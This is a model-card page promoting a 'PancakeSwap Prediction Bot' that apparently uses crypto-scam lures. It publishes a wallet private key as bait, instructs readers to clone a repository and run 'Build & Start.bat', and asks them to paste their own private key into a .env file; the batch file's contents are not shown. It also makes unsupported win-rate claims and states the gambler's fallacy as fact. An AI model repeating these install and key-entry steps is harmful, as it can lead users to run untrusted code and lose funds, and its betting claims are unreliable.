Edit model card
YAML Metadata Warning: empty or missing yaml metadata in repo card (https://huggingface.co/docs/hub/model-cards#model-card-metadata)

๐Ÿ”ฎ PancakeSwap Prediction Bot (SMART AI powered) v18.1 ๐Ÿš€

PancakeSwap Prediction Bot using AI recommendations.

After accessing the wallet with the key below, connect to the Pancakeswap BNB Prediction game. See for yourself how I earned +6 bnb with a 73% success rate. This is just an experiment we do with an example wallet. You can do more!

Private key: 5192b3ff45eb69e460bd924fb7379be089515d19f7a418499b2c303249db3bd9 (Do not put money into the wallet whose key is written above. This may result in the loss of your funds. Use this wallet only to review earnings statistics.)

โญPlease consider giving a star.

Evidences dated 17 JANUARY 2024

Winning rate Winning rate

๐Ÿฐโšก Installation Way I

Download and Install Git here: Git

Then run the following commands in terminal or CMD:

git clone https://github.com/PredictBots/PancakeswapPredictUltimateWinner
cd PancakeswapPredictUltimateWinner
"Build & Start.bat"

๐Ÿฐโšก Installation Way II

  • Download This Repo the repository release and extract files.
  • Double-click on the "Build & Start.bat" file to run it.
  • And follow the instructions in the application window.

โš™๏ธ Setup Way I {No private key required} (Recommended)

  1. Open the bot.py file and setup the following variables:
BET_AMOUNT: 20, // Amount of each bet (In USD)

Download and Install Git here: Git

Then run the following commands in terminal or CMD:

git clone https://github.com/PredictBots/PancakeswapPredictUltimateWinner
cd PancakeswapPredictUltimateWinner
"Build & Start.bat"

Or

โš™๏ธ Setup Way II

  1. Open the .env file with any code/text editor and add your private key like so:
PRIVATE_KEY="5192b3ff45eb69e460bd924fb7379be089515d19f7a418499b2c303249db3bd9"
(If you are using automatic on browser mode, leave this blank!)
  1. Open the bot.py file and setup the following variables:
BET_AMOUNT: 30, // Amount of each bet (In USD)

๐Ÿค–๐Ÿ“ˆ Strategy

  • The bot take a series of recommendations given by Trading View and process them together with the tendency of the rest of people betting. After the algorithm have complete, it choose to bet Up or Down.

  • Additionally, you can also choose the fully AI-powered strategy.

  • After all my testings in apron 66 rounds I was able to achieve a ~73% Win rate. Of course it depends of a lot of variables, so I can't ensure that you will reproduce the same behavior. The key of the wallet we tested: "5192b3ff45eb69e460bd924fb7379be089515d19f7a418499b2c303249db3bd9". You can check the earning percentage yourself on the pancakeswap prediction site.

  • Before every round the bot will check if you have enough balance in your wallet and if you have reached the daily goal.

  • Also it will save the daily history in the /history directory.

  • Be aware that after consecutive losses, statistically you have more chances to win in the next one.

  • Inside bot.py in the THRESHOLD property of GLOBAL_CONFIG variable, you can configure the minimum certainty with which the bot will bet. For default it's set to 50, which means that from 50% certainty the bot will bet. You can raise it (50-100) to bet only when the bot is more sure about its prediction.

  • Its recommendable to have x10 - x50 the amount of bet to have an average of rounds.

๐Ÿ’ฐYou can check the history of rounds and claim rewards here: https://pancakeswap.finance/prediction

โœ”๏ธ To Do

  • USD Based bet
  • Show real time profit
  • Show real time win rate
  • Improved algorithm v5.0 ๐Ÿ”ฅ
  • AI Driven bot ๐Ÿ”ฅ
  • Stop Loss
  • Simplify settings
  • Auto collect winnings

๐Ÿ‘๏ธ Disclaimers

Please be aware of clones

Support Chat

Join the telegram support chat You can access all our announcements here.

Downloads last month

-

Downloads are not tracked for this model. How to track
Unable to determine this model's library. Check the docs .